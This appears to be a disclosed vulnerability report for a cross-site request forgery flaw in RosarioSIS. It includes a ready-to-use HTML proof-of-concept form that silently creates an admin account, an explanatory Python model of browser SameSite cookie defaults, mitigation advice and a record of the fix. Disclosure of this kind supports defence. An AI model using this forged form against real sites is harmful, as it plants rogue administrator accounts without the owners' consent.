Cross-Site Request Forgery (CSRF) in francoisjacquet/rosariosis

Valid

Reported on

Jul 28th 2021


✍️ Description

When the SameSite attribute of a cookie is not set, each browser applies its own default value. Chrome and Chromium-based browsers default the attribute to "Lax", which means that if your site performs add/delete/alter operations in response to a GET HTTP request, it remains vulnerable to CSRF attacks.

But Firefox and Safari (two of the big ones) do not default the attribute to "Lax"; they treat it as "None", which leaves both POST and GET requests vulnerable to CSRF attacks.

In Firefox and Safari I can add any custom user with CSRF, an action that users are already allowed to do manually.

🕵️‍♂️ Proof of Concept

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://www.rosariosis.org/demonstration/Modules.php?modname=Users/User.php&category_id=1&staff_id=&modfunc=update" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="photo" value="" />
      <input type="hidden" name="staff[TITLE]" value="" />
      <input type="hidden" name="staff[FIRST_NAME]" value="aaa" />
      <input type="hidden" name="staff[MIDDLE_NAME]" value="" />
      <input type="hidden" name="staff[LAST_NAME]" value="aaa" />
      <input type="hidden" name="staff[NAME_SUFFIX]" value="" />
      <input type="hidden" name="staff[USERNAME]" value="aaa123aaa" />
      <input type="hidden" name="staff[PASSWORD]" value="aaa123aaa" />
      <input type="hidden" name="staff[PROFILE]" value="admin" />
      <input type="hidden" name="staff[PROFILE_ID]" value="" />
      <input type="hidden" name="staff[SCHOOLS][1]" value="" />
      <input type="hidden" name="staff[EMAIL]" value="" />
      <input type="hidden" name="staff[CUSTOM_200000001]" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Open PoC.html and click the button; afterwards you can see that an admin user named aaa has been created.
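To make the browser defaults described above concrete, here is an added Python model (not RosarioSIS code) of the decision a browser makes when deciding whether to attach a session cookie to the PoC's cross-site form submission. The per-browser defaults are assumptions taken from the description, and the request shapes are constructed.

```python
from dataclasses import dataclass
from typing import Optional

# Policy a browser applies when Set-Cookie carries no SameSite attribute:
# Chrome and Chromium-based browsers assume "lax"; Firefox and Safari apply
# no restriction, which behaves like "none". (Assumed defaults, as stated
# in the report above.)
DEFAULT_WHEN_UNSET = {"chrome": "lax", "firefox": "none", "safari": "none"}


@dataclass(frozen=True)
class Request:
    method: str        # "GET", "POST", ...
    cross_site: bool   # initiated from a site other than the cookie's
    top_level: bool    # navigates the top-level window (link or form submit)


def effective_samesite(browser: str, samesite: Optional[str]) -> str:
    """Explicit attribute wins; otherwise the browser's default applies."""
    return samesite.lower() if samesite else DEFAULT_WHEN_UNSET[browser]


def cookie_sent(browser: str, samesite: Optional[str], req: Request) -> bool:
    """Would the browser attach the session cookie to this request?"""
    policy = effective_samesite(browser, samesite)
    if not req.cross_site:
        return True        # same-site requests always carry the cookie
    if policy == "none":
        return True        # no restriction: every cross-site request
    if policy == "strict":
        return False       # never on a cross-site request
    # "lax": only top-level navigations using a safe method. A cross-site
    # <form method="POST"> submission therefore arrives without the cookie.
    return req.top_level and req.method.upper() in ("GET", "HEAD", "OPTIONS")


# Constructed requests for the two cases the report contrasts: the PoC's
# cross-site POST form submission and a cross-site top-level GET.
POC_POST = Request(method="POST", cross_site=True, top_level=True)
CROSS_GET = Request(method="GET", cross_site=True, top_level=True)


def poc_succeeds(browser: str, samesite: Optional[str] = None) -> bool:
    """True if the forged POST would arrive carrying the victim's session."""
    return cookie_sent(browser, samesite, POC_POST)


if __name__ == "__main__":
    for b in DEFAULT_WHEN_UNSET:
        print(b, "unset:", poc_succeeds(b), "Lax:", poc_succeeds(b, "Lax"),
              "Strict:", poc_succeeds(b, "Strict"))
```

Chrome's implicit Lax default also exempts top-level POSTs for a short window after a cookie is set, so relying on browser defaults is not a defence: set the attribute explicitly and verify a per-request anti-CSRF token on every state-changing handler.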

💥 Impact

This vulnerability makes it possible to create an arbitrary user.

2 years ago

Admin


Hey amammad, I've reached out to the rosariosis team. Waiting to hear back.

We have contacted a member of the francoisjacquet/rosariosis team and are waiting to hear back 2 years ago
francoisjacquet/rosariosis maintainer marked this as fixed with commit f95bd0 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE